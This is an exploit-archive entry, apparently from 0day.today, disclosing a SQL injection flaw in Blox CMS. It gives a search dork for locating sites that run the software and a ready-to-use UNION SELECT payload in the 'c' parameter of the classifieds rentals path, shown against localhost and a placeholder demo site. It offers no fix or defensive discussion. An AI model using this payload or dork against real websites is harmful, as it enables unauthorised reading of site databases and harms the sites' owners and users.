id: 12387
date: 05/24/2010
title: Blox CMS SQL Injection Vulnerability
author: CoBRa_21
cves: 

====================================
Blox CMS SQL Injection Vulnerability
====================================


Author: CoBRa_21
 
Script Home: http://bloxcms.com/
 
Dork: Powered by Blox CMS from TownNews.com
 
-------------------------------------------------------------------------------------------
 
Sql Injection:
 
http://localhost/[path]/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15
 
 
Demo :
 
http://www.site.com/app/classifieds/rentals/?c=-156%20union%20select%200,1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15
 
------------------------------------------------------------------------------------------- 



#  0day.today [2023-03-26]  #